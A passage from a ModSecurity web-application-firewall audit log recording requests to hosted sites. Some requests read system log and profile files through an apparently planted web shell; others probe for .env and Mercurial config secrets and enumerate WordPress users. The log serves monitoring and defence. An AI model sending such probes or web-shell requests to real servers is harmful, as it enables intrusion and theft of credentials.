+claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9c5ee51d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2948 Connection: close Content-Type: text/html; charset=UTF-8 --9c5ee51d-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5wZRpvTPvjcsG3xaop6wAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1749971045307303 4474 (- - -) Stopwatch2: 1749971045307303 4474; combined=2368, p1=360, p2=1869, p3=38, p4=39, p5=62, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9c5ee51d-Z-- --ccc4103d-A-- [15/Jun/2025:12:34:05.402214 +0530] aE5wZT8QAuiw8zL7QHNwfgAAAAU 216.73.216.83 50506 127.0.0.1 7081 --ccc4103d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fkern.log.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --ccc4103d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2948 Connection: close Content-Type: text/html; charset=UTF-8 --ccc4103d-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5wZT8QAuiw8zL7QHNwfgAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749971045398382 3886 (- - -) Stopwatch2: 1749971045398382 3886; combined=2058, p1=329, p2=1608, p3=33, p4=30, p5=58, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ccc4103d-Z-- --b9264d1c-A-- [15/Jun/2025:12:34:53.429369 +0530] aE5wlbuLyDaLfLFz1OBTzAAAAAs 216.73.216.83 50374 127.0.0.1 7081 --b9264d1c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fkern.log.4.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b9264d1c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2948 Connection: close Content-Type: text/html; charset=UTF-8 --b9264d1c-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5wlbuLyDaLfLFz1OBTzAAAAAs"] Apache-Handler: application/x-httpd-php Stopwatch: 1749971093425586 3836 (- - -) Stopwatch2: 1749971093425586 3836; combined=2033, p1=330, p2=1583, p3=34, p4=31, p5=55, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b9264d1c-Z-- --05d9493f-A-- [15/Jun/2025:12:34:54.428341 +0530] aE5wlj8QAuiw8zL7QHNwmQAAAAU 216.73.216.83 50504 127.0.0.1 7081 --05d9493f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fsyslog.3.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --05d9493f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2946 Connection: close Content-Type: text/html; charset=UTF-8 --05d9493f-H-- Message: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /var/log/syslog.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /var/log/syslog.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5wlj8QAuiw8zL7QHNwmQAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749971094424107 4290 (- - -) Stopwatch2: 1749971094424107 4290; combined=2331, p1=361, p2=1811, p3=39, p4=37, p5=83, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --05d9493f-Z-- --c062386c-A-- [15/Jun/2025:12:41:39.139605 +0530] aE5yKXxTls_n68HhJPDWewAAAAE 54.87.236.129 39712 127.0.0.1 7081 --c062386c-B-- GET //www.tandonamit.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 54.87.236.129 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Microsoft URL Control - 6.00.8862 Accept-Charset: utf-8 Accept-Encoding: gzip --c062386c-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Vary: Accept-Encoding Location: https://www.tandonamit.com/www.tandonamit.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --c062386c-H-- Message: Warning. Pattern match "(?i:(?:^(?:microsoft url|user-Agent|www\\.weblogs\\.com|(?:jakart|vi)a|(google|i{0,1}explorer{0,1}\\.exe|(ms){0,1}ie( [0-9.]{1,}){0,1} {0,1}(compatible( browser){0,1}){0,1})$)|\\bdatacha0s\\b|; widows|\\\\r|a(?: href=|d(?:sarobot|vanced email extractor ..." at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/modsecurity.d/rules/comodo_free/03_Global_Agents.conf"] [line "29"] [id "210831"] [rev "2"] [msg "COMODO WAF: Rogue web site crawler||www.tandonamit.com|F|4"] [data "Microsoft URL"] [severity "WARNING"] [tag "CWAF"] [tag "Agents"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Pattern match "(?i:(?:^(?:microsoft url|user-Agent|www\\\\\\\\.weblogs\\\\\\\\.com|(?:jakart|vi)a|(google|i{0,1}explorer{0,1}\\\\\\\\.exe|(ms){0,1}ie( [0-9.]{1,}){0,1} {0,1}(compatible( browser){0,1}){0,1})$)|\\\\\\\\bdatacha0s\\\\\\\\b|; widows|\\\\\\\\\\\\\\\\r|a(?: href=|d(?:sarobot|vanced email extractor ..." at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/modsecurity.d/rules/comodo_free/03_Global_Agents.conf"] [line "29"] [id "210831"] [rev "2"] [msg "COMODO WAF: Rogue web site crawler||www.tandonamit.com|F|4"] [data "Microsoft URL"] [severity "WARNING"] [tag "CWAF"] [tag "Agents"] [hostname "www.tandonamit.com"] [uri "/www.tandonamit.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js"] [unique_id "aE5yKXxTls_n68HhJPDWewAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749971497531513 1608198 (- - -) Stopwatch2: 1749971497531513 1608198; combined=2500, p1=349, p2=2039, p3=0, p4=0, p5=112, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c062386c-Z-- --46baa05e-A-- [15/Jun/2025:12:42:19.110791 +0530] aE5yU1ut2VgqlnFqY4KCewAAABM 103.253.27.40 44302 127.0.0.1 7080 --46baa05e-B-- GET /.env HTTP/1.0 Host: deckstory.com X-Real-IP: 103.253.27.40 Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --46baa05e-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --46baa05e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "deckstory.com"] [uri "/.env"] [unique_id "aE5yU1ut2VgqlnFqY4KCewAAABM"] Stopwatch: 1749971539107369 3479 (- - -) Stopwatch2: 1749971539107369 3479; combined=2103, p1=439, p2=1562, p3=22, p4=28, p5=52, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --46baa05e-Z-- --a0aaec67-A-- [15/Jun/2025:12:42:20.021806 +0530] aE5yVE0nW1houYLyuKrBmAAAAA0 103.253.27.40 39288 127.0.0.1 7080 --a0aaec67-B-- GET /sendgrid/.env HTTP/1.0 Host: deckstory.com X-Real-IP: 103.253.27.40 Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --a0aaec67-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0aaec67-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "deckstory.com"] [uri "/sendgrid/.env"] [unique_id "aE5yVE0nW1houYLyuKrBmAAAAA0"] Stopwatch: 1749971540018558 3315 (- - -) Stopwatch2: 1749971540018558 3315; combined=2041, p1=418, p2=1501, p3=22, p4=27, p5=72, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a0aaec67-Z-- --d151e05c-A-- [15/Jun/2025:12:42:21.827960 +0530] aE5yVYv4sB1Z-dcxHpExlgAAABU 103.253.27.40 39304 127.0.0.1 7080 --d151e05c-B-- GET /.env HTTP/1.0 Host: deckstory.com X-Real-IP: 103.253.27.40 Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --d151e05c-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --d151e05c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "deckstory.com"] [uri "/.env"] [unique_id "aE5yVYv4sB1Z-dcxHpExlgAAABU"] Stopwatch: 1749971541824773 3240 (- - -) Stopwatch2: 1749971541824773 3240; combined=2073, p1=522, p2=1447, p3=28, p4=27, p5=49, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d151e05c-Z-- --82ba8236-A-- [15/Jun/2025:12:44:28.842766 +0530] aE5y1Laxs8_oWLL8MgpEUQAAAAY 196.251.85.177 45972 127.0.0.1 7081 --82ba8236-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.thebrandwagon.in X-Real-IP: 196.251.85.177 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: _sfs_id=f1da9d4423fd8509ce6f61e56214666b1749971666 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --82ba8236-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.thebrandwagon.in/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --82ba8236-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.thebrandwagon.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.thebrandwagon.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.thebrandwagon.in"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5y1Laxs8_oWLL8MgpEUQAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/thebrandwagon.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749971668738493 104360 (- - -) Stopwatch2: 1749971668738493 104360; combined=2236, p1=324, p2=1817, p3=0, p4=0, p5=95, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --82ba8236-Z-- --6bc95651-A-- [15/Jun/2025:12:49:31.632053 +0530] aE50A8ZRGs9Zs5Qd_koDfQAAAAA 3.224.215.150 33456 127.0.0.1 7081 --6bc95651-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/profile.d&viewfile=//etc/profile.d/phpenv.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.224.215.150 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --6bc95651-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3496 Connection: close Content-Type: text/html; charset=UTF-8 --6bc95651-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile.d/phpenv.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE50A8ZRGs9Zs5Qd_koDfQAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile.d/phpenv.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE50A8ZRGs9Zs5Qd_koDfQAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749971971627704 4404 (- - -) Stopwatch2: 1749971971627704 4404; combined=2429, p1=395, p2=1844, p3=38, p4=35, p5=117, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6bc95651-Z-- --c6c03679-A-- [15/Jun/2025:12:53:04.673995 +0530] aE50100nW1houYLyuKrDCwAAAA0 106.216.241.143 52498 127.0.0.1 7081 --c6c03679-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 106.216.241.143 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 473 sec-ch-ua-platform: "Android" user-agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Mobile Safari/537.36 sec-ch-ua: "Google Chrome";v="137", "Chromium";v="137", "Not/A)Brand";v="24" content-type: text/plain;charset=UTF-8 sec-ch-ua-mobile: ?1 accept: */* origin: https://www.retaxis.com sec-fetch-site: same-origin sec-fetch-mode: cors sec-fetch-dest: empty referer: https://www.retaxis.com/portfolio/sell-images-online/ accept-encoding: gzip, deflate, br, zstd accept-language: en-IN,en-GB;q=0.9,en-US;q=0.8,en;q=0.7 priority: u=1, i cookie: _sfs_id=00aae6bddc972c19a8e6a65c84eb9d3a1749972180; _ga_PETSZCXF5J=GS2.1.s1749972182$o1$g0$t1749972182$j60$l0$h0; _ga=GA1.1.2068851912.1749972183; _fbp=fb.1.1749972182873.290859500322633577 --c6c03679-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: PHPSESSID=494v3g8bkhmk0tr7ukp8ft3oc0; expires=Sat, 13 Sep 2025 07:23:04 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --c6c03679-E-- --c6c03679-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aE50100nW1houYLyuKrDCwAAAA0"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aE50100nW1houYLyuKrDCwAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749972183664495 1009637 (- - -) Stopwatch2: 1749972183664495 1009637; combined=4757, p1=575, p2=3850, p3=143, p4=43, p5=146, sr=191, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache WebApp-Info: "default" "1749972183" "-" Engine-Mode: "DETECTION_ONLY" --c6c03679-Z-- --99379c1a-A-- [15/Jun/2025:12:55:10.766813 +0530] aE51VsZRGs9Zs5Qd_koEQQAAAAA 195.178.110.39 56520 127.0.0.1 7081 --99379c1a-B-- GET /.hg/hgrc HTTP/1.0 Host: www.3econcepts.com X-Real-IP: 195.178.110.39 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept-Charset: utf-8 Accept-Encoding: gzip --99379c1a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.3econcepts.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --99379c1a-H-- Message: Warning. Matched phrase "/.hg/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.hg/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.3econcepts.com"] [uri "/.hg/hgrc"] [unique_id "aE51VsZRGs9Zs5Qd_koEQQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749972310017065 749819 (- - -) Stopwatch2: 1749972310017065 749819; combined=2071, p1=418, p2=1547, p3=0, p4=0, p5=106, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --99379c1a-Z-- --eccfd740-A-- [15/Jun/2025:12:57:11.791652 +0530] aE51z8ZRGs9Zs5Qd_koEfgAAAAA 124.198.132.106 51594 127.0.0.1 7080 --eccfd740-B-- GET /.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 124.198.132.106 Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept-Encoding: gzip, deflate Accept: */* --eccfd740-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --eccfd740-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file 